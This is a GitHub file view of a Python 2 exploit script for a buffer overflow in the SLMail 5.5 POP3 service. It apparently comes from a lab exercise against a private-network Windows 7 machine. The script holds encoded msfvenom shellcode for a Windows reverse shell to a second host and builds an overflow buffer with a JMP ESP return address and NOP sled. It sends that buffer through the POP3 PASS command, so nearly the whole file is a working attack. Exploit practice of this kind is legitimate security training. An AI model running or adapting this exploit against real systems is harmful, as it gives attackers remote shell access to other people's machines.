-
Notifications
You must be signed in to change notification settings - Fork 5
Expand file tree
/
Copy pathslmail55.py
More file actions
48 lines (44 loc) · 2.1 KB
/
slmail55.py
File metadata and controls
48 lines (44 loc) · 2.1 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/python
import socket
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.194 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
shellcode = (
"\xdb\xdf\xd9\x74\x24\xf4\x5e\x33\xc9\xb1\x52\xbf\x26\x1a\xb3"
"\x6d\x83\xc6\x04\x31\x7e\x13\x03\x58\x09\x51\x98\x58\xc5\x17"
"\x63\xa0\x16\x78\xed\x45\x27\xb8\x89\x0e\x18\x08\xd9\x42\x95"
"\xe3\x8f\x76\x2e\x81\x07\x79\x87\x2c\x7e\xb4\x18\x1c\x42\xd7"
"\x9a\x5f\x97\x37\xa2\xaf\xea\x36\xe3\xd2\x07\x6a\xbc\x99\xba"
"\x9a\xc9\xd4\x06\x11\x81\xf9\x0e\xc6\x52\xfb\x3f\x59\xe8\xa2"
"\x9f\x58\x3d\xdf\xa9\x42\x22\xda\x60\xf9\x90\x90\x72\x2b\xe9"
"\x59\xd8\x12\xc5\xab\x20\x53\xe2\x53\x57\xad\x10\xe9\x60\x6a"
"\x6a\x35\xe4\x68\xcc\xbe\x5e\x54\xec\x13\x38\x1f\xe2\xd8\x4e"
"\x47\xe7\xdf\x83\xfc\x13\x6b\x22\xd2\x95\x2f\x01\xf6\xfe\xf4"
"\x28\xaf\x5a\x5a\x54\xaf\x04\x03\xf0\xa4\xa9\x50\x89\xe7\xa5"
"\x95\xa0\x17\x36\xb2\xb3\x64\x04\x1d\x68\xe2\x24\xd6\xb6\xf5"
"\x4b\xcd\x0f\x69\xb2\xee\x6f\xa0\x71\xba\x3f\xda\x50\xc3\xab"
"\x1a\x5c\x16\x7b\x4a\xf2\xc9\x3c\x3a\xb2\xb9\xd4\x50\x3d\xe5"
"\xc5\x5b\x97\x8e\x6c\xa6\x70\x71\xd8\xa9\x42\x19\x1b\xa9\x43"
"\x61\x92\x4f\x29\x85\xf3\xd8\xc6\x3c\x5e\x92\x77\xc0\x74\xdf"
"\xb8\x4a\x7b\x20\x76\xbb\xf6\x32\xef\x4b\x4d\x68\xa6\x54\x7b"
"\x04\x24\xc6\xe0\xd4\x23\xfb\xbe\x83\x64\xcd\xb6\x41\x99\x74"
"\x61\x77\x60\xe0\x4a\x33\xbf\xd1\x55\xba\x32\x6d\x72\xac\x8a"
"\x6e\x3e\x98\x42\x39\xe8\x76\x25\x93\x5a\x20\xff\x48\x35\xa4"
"\x86\xa2\x86\xb2\x86\xee\x70\x5a\x36\x47\xc5\x65\xf7\x0f\xc1"
"\x1e\xe5\xaf\x2e\xf5\xad\xc0\x64\x57\x87\x48\x21\x02\x95\x14"
"\xd2\xf9\xda\x20\x51\x0b\xa3\xd6\x49\x7e\xa6\x93\xcd\x93\xda"
"\x8c\xbb\x93\x49\xac\xe9"
)
# Exploit string: 2606 As + JMP ESP memory address + nops + shellcode
buffer="A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 16 + shellcode
try:
print "\nSending buffer..."
# Connect to Windows 7 machine
s.connect(('192.168.1.59',110))
data = s.recv(1024)
s.send('USER username'+ '\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
s.close()
print "\ Done."
except:
print "Could not connect!"